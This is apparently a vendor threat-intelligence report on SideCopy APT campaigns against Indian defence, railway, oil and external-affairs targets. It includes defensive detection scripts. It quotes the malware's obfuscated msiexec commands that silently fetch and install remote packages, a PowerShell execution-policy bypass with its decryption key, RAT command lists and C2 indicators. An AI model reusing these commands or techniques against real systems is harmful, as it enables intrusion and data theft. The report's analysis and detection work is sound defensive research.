    Seqrite Labs APT team has uncovered new tactics of Pakistan-linked SideCopy APT deployed since the last week of December 2024. The group has expanded its scope of targeting beyond Indian government, defence, maritime sectors, and university students to now include entities under railway, oil & gas, and external affairs ministries. One notable shift in recent campaigns is the transition from using HTML Application (HTA) files to adopting Microsoft Installer (MSI) packages as a primary staging mechanism.

    Threat actors are continuously evolving their tactics to evade detection, and this shift is driven by their persistent use of DLL side-loading and multi-platform intrusions. This evolution also incorporates techniques such as reflective loading and repurposing open-source tools such as Xeno RAT and Spark RAT, following its trend with Async RAT to extend its capabilities. Additionally, a new payload dubbed CurlBack RAT has been identified that registers the victim with the C2 server.

    Key Findings

    • Usernames associated with the attacker's email IDs impersonate a government personnel member with a cyber security background, utilizing compromised IDs.
    • A fake domain mimicking an e-governance service, with an open directory, is used to host payloads and credential phishing login pages.
    • Thirteen sub-domains and URLs host login pages for various RTS Services for multiple City Municipal Corporations (CMCs), all in the state of Maharashtra.
    • The official domain of National Hydrology Project (NHP), under the Ministry of Water Resources, has been compromised to deliver malicious payloads.
    • New tactics such as reflective loading and AES decryption of the resource section via PowerShell are used to deploy a custom version of the C#-based open-source tool XenoRAT.
    • A modified variant of the Golang-based open-source tool SparkRAT, targeting Linux platforms, has been deployed via the same stager previously used for Poseidon and Ares RAT payloads.
    • A new RAT dubbed CurlBack, which uses the DLL side-loading technique, has been identified. It registers the victim with the C2 server via a UUID and supports file transfer using curl.
    • Honey-trap themed campaigns were observed in January 2025 and June 2024, coinciding with the arrest of a government employee accused of leaking sensitive data to a Pakistani handler.
    • A previously compromised education portal seen in Aug 2024, became active again in February 2025 with new URLs targeting university students. These employ three different themes: “Climate Change”, “Research Work”, and “Professional” (Complete analysis can be viewed in the recording here, explaining six different clusters of SideCopy APT).
    • The parent group of SideCopy, APT36, has targeted Afghanistan after a long with a theme related to Office of the Prisoners Administration (OPA) under Islamic Emirate of Afghanistan. A recent campaign targeting Linux systems with the theme “Developing Leadership for Future Wars” involves AES/RC4 encrypted stagers to drop MeshAgent RMM tool.

    Targeted sectors under the Indian Ministry

    • Railways
    • Oil & Gas
    • External Affairs
    • Defence

    Phishing Emails

    The campaign targeting the Defence sector begins with a phishing email dated 13 January 2025 with the subject “Update schedule for NDC 65 as discussed”. The email contains a link to download a file named “NDC65-Updated-Schedule.pdf” to lure the target.

    Fig. 1 – NDC Phishing Email (1)

    A second phishing email, sent on 15 January 2025 with the subject “Policy update for this course.txt”, also contains a phishing link. It originates from an official-looking email ID that is likely compromised. The National Defence College (NDC), located in Delhi, is a defence service training institute for the strategy and practice of national security and operates under the Ministry of Defence, India.

    Fig. 2 – NDC Phishing Email (2)

    The attacker’s email address “gsosystems-ndc@outlook[.]com” was created on 10 January 2025 in the UAE and was last seen active on 28 February 2025. OSINT reveals a similar-looking email ID, “gsosystems.ndc-mod@nic[.]in”, belonging to the National Informatics Centre (NIC), a department under the Ministry of Electronics and Information Technology (MeitY), India. The username linked to the attacker’s email impersonates a government official with a cyber security background.

    Fig. 3 – Attacker Email

    Decoy Documents

    The decoy is related to the National Defence College (NDC) in India and contains the Annual Training Calendar (Study & Activities) for the year 2025 for the 65th Course (NDC-65). Located in New Delhi, the NDC is the defence service training institute and highest seat of strategic learning for officers of the Defence Services (Indian Armed Forces) and the Civil Services, operating under the Ministry of Defence, India.

    Fig. 4 – NDC Calendar Decoy [Defence]

    Another phishing archive, named “2024-National-Holidays-RH-PER_N-1.zip”, comes in two variants targeting either Windows or Linux systems. Once the payload is triggered, it opens a decoy document that, as the name suggests, contains the list of holidays for Open Line staff for the year 2024. This is an official notice from Southern Railway dated 19 December 2023, specifically for the Chennai Division. Southern Railway (SR) is one of the eighteen zones of Indian Railways, a state-owned undertaking of the Ministry of Railways, India.

    Fig. 5 – Holiday List Decoy [Railways]

    The third infection chain includes a document titled “Cybersecurity Guidelines” for the year 2024, which appears to be issued by Hindustan Petroleum Corporation Limited (HPCL). Headquartered in Mumbai, HPCL is a public sector undertaking in the petroleum and natural gas industry and a subsidiary of the Oil and Natural Gas Corporation (ONGC), a state-owned undertaking of the Ministry of Petroleum and Natural Gas, India.

    Fig. 6 – Cybersecurity Guidelines Decoy [Oil & Gas]

    Another document linked to the same infection chain is the “Pharmaceutical Product Catalogue” for 2025, issued by MAPRA and specifically intended for employees of the Ministry of External Affairs (MEA), India. Mapra Laboratories Pvt. Ltd. is a pharmaceutical company headquartered in Mumbai.

    Fig. 7 – Catalogue Decoy [External Affairs]

    OpenDir and CredPhish

    A fake domain impersonating e-governance portal services has been used in the campaign targeting railway entities. The domain was created on 16 June 2023 and features an open directory hosting multiple files, identified during the investigation.

    Fig. 8 – Open directory

    A total of 13 sub-domains have been identified, which function as login portals for various systems such as:

    • Webmail
    • Safety Tank Management System
    • Payroll System
    • Set Authority

    These are likely used for credential phishing and have been actively impersonating multiple legitimate government portals since last year. The login pages are typically associated with RTS services (Right to Public Services Act) and cater to various City Municipal Corporations (CMCs). All of these fake portals belong to cities located within the state of Maharashtra:

    • Chandrapur
    • Gadchiroli
    • Akola
    • Satara
    • Vasai Virar
    • Ballarpur
    • Mira Bhaindar

    Fig. 9 – Login portals hosted on fake domain

    The following table lists the identified sub-domains and the dates they were first observed:

    Sub-domain                    First Seen
    gadchiroli.egovservice[.]in   2024-12-16
    pen.egovservice[.]in          2024-11-27
    cpcontacts.egovservice[.]in   2024-01-03
    cpanel.egovservice[.]in       2024-01-03
    webdisk.egovservice[.]in      2024-01-03
    cpcalendars.egovservice[.]in  2024-01-03
    webmail.egovservice[.]in      2024-01-03
    dss.egovservice[.]in          2023-11-03
    cmc.egovservice[.]in          2023-11-03
    mail.egovservice[.]in         2023-10-13
    pakola.egovservice[.]in       2023-07-23
    pakora.egovservice[.]in       2023-07-23
    egovservice[.]in              2023-06-16

    DNS history shows that all of these domains were primarily registered under AS 140641 (YOTTA NETWORK SERVICES PRIVATE LIMITED), which indicates a coordinated infrastructure set up to impersonate legitimate services and collect credentials from unsuspecting users.

    Fig. 10 – DNS history

    Further investigation into the open directory revealed additional URLs associated with the fake domain. These URLs likely serve similar phishing purposes and host further decoy content.

    hxxps://egovservice.in/vvcmcrts/
    hxxps://egovservice.in/vvcmc_safety_tank/
    hxxps://egovservice.in/testformonline/test_form
    hxxps://egovservice.in/payroll_vvcmc/
    hxxps://egovservice.in/pakora/egovservice.in/
    hxxps://egovservice.in/dssrts/
    hxxps://egovservice.in/cmc/
    hxxps://egovservice.in/vvcmcrtsballarpur72/
    hxxps://egovservice.in/dss/
    hxxps://egovservice.in/130521/set_authority/
    hxxps://egovservice.in/130521/13/

    Cluster-A

    The first cluster of SideCopy’s operations shows a sophisticated approach by simultaneously targeting both Windows and Linux environments. New remote access trojans (RATs) have been added to their arsenal, enhancing their capability to compromise diverse systems effectively.

    Fig. 11 – Cluster A

    Windows

    A spear-phishing email link downloads an archive file that contains a shortcut with a double extension (.pdf.lnk). The archives are hosted on domains that appear legitimate:

    hxxps://egovservice.in/dssrts/helpers/fonts/2024-National-Holidays-RH-PER_N-1/
    hxxps://nhp.mowr.gov.in/NHPMIS/TrainingMaterial/aspx/Security-Guidelines/

    The shortcut launches cmd.exe with arguments that use the caret (^) escape character to evade detection and reduce readability. A new machine ID, “dv-kevin”, is seen in these files, where a “desktop-” prefix is usually observed.

    Fig. 12 – Shortcuts with double extension

    The msiexec.exe utility is used to install MSI packages hosted remotely; it is invoked with the quiet-mode flag (/q) together with the install switch (/i).

    C:\Windows\System32\cmd.exe /c m^s^i^e^x^e^c.exe /q /i h^t^t^p^s^:^/^/^e^g^o^v^s^e^r^v^i^c^e^.^i^n^/^d^s^s^r^t^s^/^h^e^l^p^e^r^s^/^f^o^n^t^s^/^2^0^2^4^-^N^a^t^i^o^nal-^H^o^l^i^d^a^y^s^-^R^H^-^P^E^R^_^N-^1^/^i^n^s^t^/
    C:\Windows\System32\cmd.exe /c m^s^i^e^x^e^c.exe /q /i h^t^t^p^s^:^/^/^n^h^p^.^m^o^w^r^.^g^o^v^.^i^n^/^N^H^P^M^I^S^/^T^r^a^i^n^i^n^g^M^a^t^e^r^i^a^l^/^a^s^p^x^/^S^e^c^u^r^i^t^y^-^G^u^i^d^e^l^i^n^e^s^/^w^o^n^t^/
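    The caret obfuscation in the two command lines above only defeats detection that matches the raw string. As an added example (not code from the report or from SEQRITE), the following Python decodes the carets the way cmd.exe does and then checks the normalised command line for msiexec installing a package straight from an http(s) URL in quiet mode, the combination seen in these shortcuts. The two obfuscated samples are the command lines quoted above; the third, benign local install is constructed for contrast.

```python
"""Normalise caret-obfuscated cmd.exe command lines and flag remote MSI installs.

Added example, not code from the report or from SEQRITE. cmd.exe treats '^'
as an escape that yields the next character literally, so "m^s^i^e^x^e^c"
is executed as "msiexec" while defeating naive string matching. A detection
pipeline should decode the carets first and only then look for msiexec
installing a package straight from an http(s) URL in quiet mode.
"""
import re

# Constructed samples: the first two are the command lines quoted in the
# report (taken from the shortcut files); the third is a benign local install.
SAMPLE_COMMAND_LINES = [
    r"C:\Windows\System32\cmd.exe /c m^s^i^e^x^e^c.exe /q /i h^t^t^p^s^:^/^/^e^g^o^v^s^e^r^v^i^c^e^.^i^n^/^d^s^s^r^t^s^/^h^e^l^p^e^r^s^/^f^o^n^t^s^/^2^0^2^4^-^N^a^t^i^o^nal-^H^o^l^i^d^a^y^s^-^R^H^-^P^E^R^_^N-^1^/^i^n^s^t^/",
    r"C:\Windows\System32\cmd.exe /c m^s^i^e^x^e^c.exe /q /i h^t^t^p^s^:^/^/^n^h^p^.^m^o^w^r^.^g^o^v^.^i^n^/^N^H^P^M^I^S^/^T^r^a^i^n^i^n^g^M^a^t^e^r^i^a^l^/^a^s^p^x^/^S^e^c^u^r^i^t^y^-^G^u^i^d^e^l^i^n^e^s^/^w^o^n^t^/",
    r"C:\Windows\System32\cmd.exe /c msiexec.exe /i C:\Users\alice\Downloads\7zip.msi /qn",
]


def decode_carets(cmdline: str) -> str:
    """Undo cmd.exe caret escaping: '^x' becomes 'x', '^^' becomes '^',
    and a caret at the very end (line continuation) is dropped."""
    out = []
    i = 0
    while i < len(cmdline):
        if cmdline[i] == "^":
            if i + 1 < len(cmdline):
                out.append(cmdline[i + 1])
            i += 2
        else:
            out.append(cmdline[i])
            i += 1
    return "".join(out)


# msiexec ... /i <http(s) URL>: the package is fetched over the network at install time
REMOTE_MSI_RE = re.compile(r"msiexec(?:\.exe)?\b.*?/i\s+(https?://\S+)", re.IGNORECASE)
# /q, /qn, /qb, /qr, /qf: no UI, so the user sees nothing during the install
QUIET_RE = re.compile(r"(?:^|\s)/q[nbrf]?\b", re.IGNORECASE)


def analyze(cmdline: str) -> dict:
    """Return the decoded command line plus the indicators a rule would key on."""
    decoded = decode_carets(cmdline)
    match = REMOTE_MSI_RE.search(decoded)
    return {
        "decoded": decoded,
        "obfuscated": "^" in cmdline,               # carets present in the raw line
        "remote_msi": match is not None,             # msiexec pulling the package from a URL
        "url": match.group(1) if match else None,
        "quiet": QUIET_RE.search(decoded) is not None,
    }


def triage(cmdlines) -> list:
    """Return the decoded lines worth an alert: a remote MSI install that is
    caret-obfuscated or silent (or both)."""
    hits = []
    for line in cmdlines:
        r = analyze(line)
        if r["remote_msi"] and (r["obfuscated"] or r["quiet"]):
            hits.append(r["decoded"])
    return hits


if __name__ == "__main__":
    for hit in triage(SAMPLE_COMMAND_LINES):
        print("ALERT:", hit)
```

    Decoding before matching is the point: a rule written against the raw process command line would need a separate pattern for every caret placement, whereas the normalised line exposes both the msiexec invocation and the staging URL for blocking and for correlation with the open-directory indicators listed above.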

    The first domain is the fake e-governance site seen with the open directory, while the second is a compromised domain belonging to the official National Hydrology Project, an entity under the Ministry of Water Resources. The MSI contains a .NET executable, ConsoleApp1.exe, which drops multiple Base64-encoded PE files. First, the decoy document is dropped in the Public directory and opened, whereas the remaining PE files are dropped in ‘C:\ProgramData\LavaSoft\’. Among them are two DLLs:

    • Legitimate DLL: Sampeose.dll
    • Malicious DLL: DUI70.dll, identified as CurlBack RAT.

    Fig. 13 – Dropper within MSI package

    CurlBack RAT

    A signed Windows binary, girbesre.exe (original name CameraSettingsUIHost.exe), is dropped beside the DLLs. Upon execution, the EXE side-loads the malicious DLL. Persistence is achieved by dropping an HTA script (svnides.hta) that creates a Run registry key for the EXE. Two different malicious DLL samples were found, with compilation timestamps of 2024-12-24 and 2024-12-30.

    Fig. 14 – Checking response ‘/antivmcommand’

    CurlBack RAT first checks the response of a specific URL ending in ‘/antivmcommand’. If the response is “on”, it proceeds; otherwise it terminates itself, so the check acts as a remote kill switch. It then gathers system information and enumerates any connected USB devices using the registry key:

    • “SYSTEM\\ControlSet001\\Enum\\USBSTOR”

    Fig. 15 – Retrieving system info and USB devices

    Connected displays are enumerated, and running processes are checked for explorer, msedge, chrome, notepad, taskmgr, services, defender, and settings.

    Fig. 16 – Enumerate displays and processes

    Next, it generates a UUID for client registration with the C2 server. The ID generated is dumped at “C:\Users\<username>\.client_id.txt” along with the username.

    Fig. 17 – Client ID generated for C2 registration

    Before registering with the ID, persistence is set up via a scheduled task named “OneDrive” for the legitimate binary, which can be observed at “C:\Windows\System32\Tasks\OneDrive”.

    Fig. 18 – Scheduled Task

    Reversed strings appended to the C2 domain and their purpose:

    String        Functionality
    /retsiger/    Register client with the C2
    /sdnammoc/    Fetch commands from C2
    /taebtraeh/   Check connection with C2 regularly
    /stluser/     Upload results to the C2

    Once registered, the connection is kept alive to retrieve any commands that are returned in the response.
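    The kill-switch fetch and the four endpoint names above give a defender a recognisable sequence on the proxy. As an added example (not code from the report or from SEQRITE), the following Python hunts for that sequence in web proxy logs: it matches each request path against both the reversed spelling stored in the DLL and its un-reversed form, so it works whichever form the implant finally sends, and alerts only when one client walks the check-in sequence against one host. The log format, client addresses and the host name c2.example are constructed for this example; only the path names come from the report.

```python
"""Hunt for CurlBack RAT check-in traffic in web proxy logs.

Added example, not code from the report or from SEQRITE. The DLL stores its
C2 path names reversed (/retsiger/, /sdnammoc/, /taebtraeh/, /stluser/), and
the implant first fetches '/antivmcommand' and only continues if the reply is
"on". The hunt below normalises each request path, matches it against both
the stored and the un-reversed spelling, and flags a client that walks the
registration sequence against one host. Log format, client IPs and the host
'c2.example' are constructed; only the path names come from the report.
"""
import re
from collections import OrderedDict

# Path strings as found in the DLL (reversed) -> protocol stage
STAGES = {
    "/retsiger/": "register",     # register client with the C2
    "/sdnammoc/": "commands",     # fetch commands
    "/taebtraeh/": "heartbeat",   # keep-alive
    "/stluser/": "results",       # upload command output
}
KILL_SWITCH_PATH = "/antivmcommand"

# Constructed proxy log: "<timestamp> <client> <method> <host> <path> <status> <bytes>"
SAMPLE_PROXY_LOG = """\
2025-01-14T10:02:11Z 10.10.4.23 GET c2.example /antivmcommand 200 2
2025-01-14T10:02:13Z 10.10.4.23 POST c2.example /register/ 200 54
2025-01-14T10:02:43Z 10.10.4.23 GET c2.example /commands/ 200 0
2025-01-14T10:03:13Z 10.10.4.23 GET c2.example /heartbeat/ 200 0
2025-01-14T10:03:43Z 10.10.4.23 GET c2.example /heartbeat/ 200 0
2025-01-14T10:03:50Z 10.10.4.23 POST c2.example /results/ 200 1024
2025-01-14T10:05:00Z 10.10.4.77 GET www.example.org /index.html 200 5120
2025-01-14T10:05:02Z 10.10.4.77 GET www.example.org /register/ 200 2048
this line is not in the expected format
"""

LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) (?P<host>\S+) "
    r"(?P<path>\S+) (?P<status>\d{3}) (?P<bytes>\d+)$"
)


def classify_path(path: str):
    """Map a request path to a CurlBack stage name, or None if it is not one."""
    p = path.lower()
    if p == KILL_SWITCH_PATH:
        return "antivm"
    if p in STAGES:
        return STAGES[p]              # implant sent the stored (reversed) spelling
    if p[::-1] in STAGES:
        return STAGES[p[::-1]]        # implant reversed it back before sending
    return None


def hunt(log_text: str) -> dict:
    """Return {(client, host): [stages in order of first appearance]} for
    every client/host pair that touched at least one CurlBack-like path."""
    seen = OrderedDict()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                  # skip malformed lines rather than abort the hunt
        stage = classify_path(m.group("path"))
        if stage is None:
            continue
        stages = seen.setdefault((m.group("client"), m.group("host")), [])
        if stage not in stages:
            stages.append(stage)
    return seen


def flagged(log_text: str) -> list:
    """Pairs worth an alert: kill-switch probe followed by registration, or
    two or more distinct protocol stages against the same host. A lone
    '/register/' on an ordinary web site is too common to alert on."""
    alerts = []
    for key, stages in hunt(log_text).items():
        protocol = [s for s in stages if s != "antivm"]
        if ("antivm" in stages and "register" in stages) or len(protocol) >= 2:
            alerts.append(key)
    return alerts


if __name__ == "__main__":
    for client, host in flagged(SAMPLE_PROXY_LOG):
        print(f"ALERT: {client} -> {host}: {hunt(SAMPLE_PROXY_LOG)[(client, host)]}")
```

    Requiring the sequence rather than a single path keeps the false-positive rate usable: many legitimate sites expose a /register/ path, but very few are preceded by an /antivmcommand probe from the same client and followed by /commands/ and /heartbeat/ polling.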

    Fig. 19 – Commands response after registration

    If the response contains any value, it retrieves the current timestamp and executes one of the following C2 commands:

    Command      Functionality
    info         Gather system information
    download     Download files from the host
    persistence  Modify persistence settings
    run          Execute arbitrary commands
    extract      Extract data from the system
    permission   Check and elevate privileges
    users        Enumerate user accounts
    cmd          Execute command-line operations

    Fig. 20 – Checking process privilege with ‘permission’ command

    Other basic functions include fetching user and host details, extracting archive files, and creating tasks. Strings and code show that curl is embedded in the malicious DLL to enumerate and transfer various file formats:

    • Image files: GIF, JPEG, JPG, SVG
    • Text files: TXT, HTML, PDF, XML

    Fig. 21 – CURL protocols supported

    Linux

    In addition to its Windows-focused attacks, the first cluster of SideCopy also targets Linux environments. The malicious archive file shares the same name as its Windows counterpart, but with a modification date of 2024-12-20. This archive contains a Go-based ELF binary, reflecting a consistent cross-platform strategy. Upon analysis, the function flow of the stager has code similarity to the stagers associated with Poseidon and Ares RAT. These are linked to Transparent Tribe and SideCopy APTs respectively.

    Fig. 22 – Golang Stager for Linux

    Stager functionality:

    1. Uses the wget command to download a decoy (National-Holidays-RH-PER_N-1.pdf) from the egovservice domain into the target directory /.local/share and opens it.
    2. Downloads the final ELF payload as /.local/share/xdg-open and executes it.
    3. Creates a crontab at ‘/dev/shm/mycron’ under the current username to keep the payload running across system reboots.
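    The persistence in steps 2 and 3 leaves two artefacts a defender can check for: a file named like the legitimate xdg-open helper sitting in a user-writable directory, and a cron job that executes from that location. As an added example (not code from the report or from SEQRITE), the following Python audits crontab text and a file listing for exactly those traits; the sample crontab and file paths are constructed, and on a live host the functions would be fed the output of crontab -l and a file search over the home directories instead.

```python
"""Audit a user's crontab and home directory for the Linux stager's persistence.

Added example, not code from the report or from SEQRITE. The Go stager
drops its payload as /.local/share/xdg-open (a name borrowed from the
legitimate xdg-open helper, but in a user-writable location) and installs a
crontab written to /dev/shm/mycron so the payload survives reboots. The two
checks below work on plain text and path lists so they run offline on the
constructed data here; on a live host feed them the output of `crontab -l`
and a file listing of the home directories.
"""
import os
import re

# Where legitimate system helpers such as xdg-open live
SYSTEM_BIN_DIRS = ("/bin", "/sbin", "/usr/bin", "/usr/sbin", "/usr/local/bin")
# Helper names worth checking for look-alikes (xdg-open is the one in the report)
WATCHED_NAMES = ("xdg-open", "xdg-mime", "update-notifier")
# Locations a per-user cron job has no business executing from
USER_WRITABLE_PREFIXES = ("/dev/shm/", "/tmp/", "/var/tmp/", "/home/", "/root/")
HIDDEN_DIR_RE = re.compile(r"(^|/)\.[^/]+/")   # a hidden directory component, e.g. /.local/

# Constructed sample of `crontab -l` output for an infected user
SAMPLE_CRONTAB = """\
# m h dom mon dow command
SHELL=/bin/bash
@reboot /home/alice/.local/share/xdg-open
*/5 * * * * /home/alice/.local/share/xdg-open >/dev/null 2>&1
0 2 * * * /usr/bin/backup.sh --quiet
"""

# Constructed file listing (e.g. from `find /home /usr/bin -type f -name xdg-open`)
SAMPLE_PATHS = [
    "/usr/bin/xdg-open",
    "/home/alice/.local/share/xdg-open",
    "/home/alice/notes.txt",
]


def parse_crontab(text: str):
    """Yield (schedule, command) for each job line; comments, blank lines and
    VAR=value assignments are skipped."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        tokens = line.split()
        if line.startswith("@"):               # @reboot, @daily, ...
            yield tokens[0], " ".join(tokens[1:])
        elif "=" in tokens[0]:                 # SHELL=..., PATH=...
            continue
        elif len(tokens) > 5:
            yield " ".join(tokens[:5]), " ".join(tokens[5:])


def suspicious_cron_entries(text: str) -> list:
    """Return the jobs whose command runs from a user-writable or hidden
    directory, with the reasons; a plain system script is left alone."""
    findings = []
    for schedule, command in parse_crontab(text):
        reasons = []
        words = command.split()
        if any(w.startswith(USER_WRITABLE_PREFIXES) for w in words):
            reasons.append("executes from a user-writable location")
        if HIDDEN_DIR_RE.search(command):
            reasons.append("path contains a hidden directory")
        if schedule == "@reboot":
            reasons.append("@reboot persistence")
        # @reboot alone is legitimate; report it only together with a path finding
        if reasons and reasons != ["@reboot persistence"]:
            findings.append({"schedule": schedule, "command": command, "reasons": reasons})
    return findings


def masquerading_binaries(paths) -> list:
    """Files named like a watched system helper but stored outside the
    system binary directories, e.g. ~/.local/share/xdg-open."""
    return [
        p for p in paths
        if os.path.basename(p) in WATCHED_NAMES
        and os.path.dirname(p) not in SYSTEM_BIN_DIRS
    ]


if __name__ == "__main__":
    for f in suspicious_cron_entries(SAMPLE_CRONTAB):
        print(f"cron: {f['schedule']} {f['command']} <- {', '.join(f['reasons'])}")
    for p in masquerading_binaries(SAMPLE_PATHS):
        print("masquerade:", p)
```

    The crontab the stager writes to /dev/shm/mycron is loaded into the user's cron spool, so crontab -l is the right source on a live host; the file under /dev/shm may or may not still exist by the time of triage, which is why the check keys on the spool contents rather than on that path.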

    The final payload delivered by the stager is Spark RAT, an open-source remote access trojan with cross-platform support for Windows, macOS, and Linux. Written in Golang and released on GitHub in 2022, the RAT is very popular, with over 500 forks. Spark RAT uses the WebSocket protocol and HTTP requests to communicate with the C2 server.

    Fig. 23 – Custom Spark RAT ‘thunder’ connecting to C2

    Features of Spark RAT include process management and termination, network traffic monitoring, file exploration and transfer, file editing and deletion, code highlighting, desktop monitoring, screenshot capture, OS information retrieval, and remote terminal access. Additionally, it supports power management functions like shutdown, reboot, log-off, sleep, hibernate and lock screen functions.

    Cluster-B

    The second cluster of SideCopy’s activities targets Windows systems, although we suspect that it also targets Linux systems, based on their infrastructure observed since 2023.

    Fig. 24 – Cluster B

    The infection starts with a spear-phishing email link that downloads an archive file named ‘NDC65-Updated-Schedule.zip’. This contains a shortcut file with a double extension, which triggers a remote HTA file hosted on another compromised domain:

    • “hxxps://modspaceinterior.com/wp-content/upgrade/01/ & mshta.exe”

    Fig. 25 – Archive with malicious LNK

    The machine ID associated with the LNK, “desktop-ey8nc5b”, has been observed in previous SideCopy campaigns, although the modification date ‘2023:05:26’ suggests it may be an older file being reused. In parallel with the MSI stagers, the group continues to use HTA-based stagers, which remain almost fully undetected (FUD).

    Fig. 26 – Almost FUD stager of HTA

    The HTA file contains a Base64-encoded .NET payload, BroaderAspect.dll, which is decoded and loaded directly into the memory of MSHTA. This binary opens the dropped NDC decoy document in the ProgramData directory and drops an additional .NET stager disguised as a PDF in the Public directory. Persistence is set via a Run registry key named “Edgre”, which executes:

    • cmd /C start C:\Users\Public\USOShared-1de48789-1285\zuidrt.pdf

    Encrypted Payload

    The dropped .NET binary, with the PDB name ‘Myapp.pdb’, has two resource files:

    • “Myapp.Resources.Document.pdf”
    • “Myapp.Properties.Resources.resources”

    The first is decoded using a Caesar cipher with a backward shift of 9 characters. It is dropped as ‘Public\Downloads\Document.pdf’ (122.98 KB), a 2004 GIAC paper titled “Advanced communication techniques of remote access trojan horses on windows operating systems”.

    Fig. 27 – Document with appended payload

    Although this PDF is not used as a decoy, an encrypted payload is appended at its end. The malware searches for the “%%EOF” marker to separate the PDF data from the EXE data: the PDF data runs from the start of the file to the marker, while the EXE data begins 6 bytes beyond the marker.

    Fig. 28 – Extracting EXE after EOF marker

    After a delay, the EXE data is dropped as “Public\Downloads\suport.exe” (49.53 KB), and its path is passed as an argument, along with a key, to a PowerShell command.
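    The %%EOF split that the loader relies on also makes such carrier files easy to triage, because a well-formed PDF ends with %%EOF followed by at most a line ending. As an added example (not code from the report or from SEQRITE), the following Python classifies a PDF by what follows its last %%EOF marker, looks for an MZ header within a short window past the marker (the report describes the EXE starting 6 bytes after it), and carves the appended bytes so they can be hashed and analysed separately. The minimal PDF and the MZ stand-in are constructed, not the real Document.pdf or suport.exe.

```python
"""Flag PDF files that carry data appended after the final %%EOF marker.

Added example, not code from the report or from SEQRITE. The stager above
splits its resource at the "%%EOF" marker and treats what starts 6 bytes
past it as an executable. The same property makes such carriers easy to
triage: a well-formed PDF ends with %%EOF plus at most a line ending, so a
sizeable tail, especially one that begins with the "MZ" header of a PE
file, is a strong signal. Incrementally updated PDFs contain several %%EOF
markers, so the last one is the reference point. All bytes below are
constructed stand-ins, not the real Document.pdf or suport.exe.
"""
EOF_MARKER = b"%%EOF"
SEARCH_WINDOW = 64           # how far past the marker to look for an "MZ" header
TAIL_PADDING = b"\r\n\t \x00"

# Constructed minimal PDF and a constructed stand-in for a PE file
CLEAN_PDF = (b"%PDF-1.4\n1 0 obj\n<< /Type /Catalog >>\nendobj\n"
             b"trailer\n<< /Root 1 0 R >>\n%%EOF\n")
FAKE_PE = b"MZ" + b"\x90" * 62 + b"PE\x00\x00" + b"\x00" * 200
# Mirrors the layout described in the report: the EXE begins 6 bytes after the marker
TAMPERED_PDF = CLEAN_PDF + b"\r\n\r\n\r" + FAKE_PE


def analyze_pdf(data: bytes) -> dict:
    """Classify a byte string as not-pdf / no-eof / clean / appended-data / appended-pe."""
    result = {"is_pdf": data.startswith(b"%PDF-"), "eof_offset": -1,
              "tail_len": 0, "pe_offset": -1, "verdict": "not-pdf"}
    if not result["is_pdf"]:
        return result
    eof = data.rfind(EOF_MARKER)
    if eof == -1:
        result["verdict"] = "no-eof"
        return result
    result["eof_offset"] = eof
    raw_tail = data[eof + len(EOF_MARKER):]
    result["tail_len"] = len(raw_tail.strip(TAIL_PADDING))   # line endings/NULs don't count
    result["pe_offset"] = raw_tail.find(b"MZ", 0, SEARCH_WINDOW)
    if result["tail_len"] == 0:
        result["verdict"] = "clean"
    elif result["pe_offset"] != -1:
        result["verdict"] = "appended-pe"
    else:
        result["verdict"] = "appended-data"
    return result


def carve_tail(data: bytes) -> bytes:
    """Return the appended bytes (leading padding removed) so they can be
    hashed and analysed separately from the carrier PDF."""
    eof = data.rfind(EOF_MARKER)
    if eof == -1:
        return b""
    return data[eof + len(EOF_MARKER):].lstrip(TAIL_PADDING)


if __name__ == "__main__":
    for name, blob in (("clean", CLEAN_PDF), ("tampered", TAMPERED_PDF)):
        print(name, analyze_pdf(blob)["verdict"], len(carve_tail(blob)), "tail bytes")
```

    In this campaign the appended data is AES-encrypted, so the MZ check would not fire on the real sample and the "appended-data" verdict with a tail of tens of kilobytes is the signal to act on; the MZ window is there for the more common case of a plain executable glued to a PDF.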

    Fig. 29 – Extracting resource and triggering PowerShell

    PowerShell Stage

    PowerShell is executed with the basic arguments “-NoProfile -ExecutionPolicy Bypass -Command” to ignore the execution policy and the user profile. Two parameters are passed:

    • -EPath 'C:\\Users\\Public\\Downloads\\suport.exe'
    • -EKey 'wq6AHvkMcSKA++1CPE3yVwg2CpdQhEzGbdarOwOrXe0='

    After a delay, the encryption key is decoded from Base64 and its first 16 bytes are used as the IV for AES decryption (CBC mode with PKCS7 padding). The decrypted binary is then loaded as a .NET assembly directly into memory and its entry point invoked.

    Fig. 30 – PowerShell decryption

    Custom Xeno RAT

    Dumping the final .NET payload, named ‘DevApp.exe’, reveals familiar functions from Xeno RAT, an open-source remote access trojan first seen at the end of 2023. Key features include HVNC, live microphone access, a SOCKS5 reverse proxy, UAC bypass, a keylogger, and more. The custom variant used by SideCopy adds basic string manipulation methods, with the C2 and port set to 79.141.161[.]58:1256.

    Fig. 31 – Custom Xeno RAT

    Last year, a custom Xeno RAT variant named MoonPeak was used by a North Korean-linked APT tracked as UAT-5394. Similarly, custom Spark RAT variants have been adopted by Chinese-speaking actors such as DragonSpark and TAG-100.

    Infrastructure and Attribution

    The following domains were used for malware staging by the threat group; most are registered with GoDaddy.com, LLC.

    Staging Domain          First Seen  Created    ASN
    modspaceinterior[.]com  Jan 2025    Sept 2024  AS 46606 – GoDaddy
    drjagrutichavan[.]com   Jan 2025    Oct 2021   AS 394695 – GoDaddy
    nhp.mowr[.]gov[.]in     Dec 2024    Feb 2005   AS 4758 – National Informatics Centre
    egovservice[.]in        Dec 2024    June 2023  AS 140641 – GoDaddy
    pmshriggssssiwan[.]in   Nov 2024    Mar 2024   AS 47583 – Hostinger
    educationportals[.]in   Aug 2024    Aug 2024   AS 22612 – NameCheap

    The C2 domains were created just before the campaign, in the last week of December 2024. Registered through the Canadian registrar “Internet Domain Service BS Corp.”, they resolve to IPs under Cloudflare ASN 13335 located in California.

    C2 Domain                          Created      IP                                ASN
    updates.widgetservicecenter[.]com  2024-Dec-25  104.21.15[.]163, 172.67.163[.]31  ASN 13335 – Cloudflare
    updates.biossysinternal[.]com      2024-Dec-23  172.67.167[.]230, 104.21.13[.]17  ASN 13335 – Cloudflare
    (Xeno RAT C2, see below)           –            79.141.161[.]58                   ASN 202015 – HZ Hosting Ltd.

    The Xeno RAT C2, 79.141.161[.]58, presents a unique certificate common name (CN=PACKERP-63KUN8U) and is hosted with HZ Hosting Limited (ASN 202015). The port used for communication is 1256, but an open RDP port, 56777, is also observed.

    Fig. 32 – Diamond Model

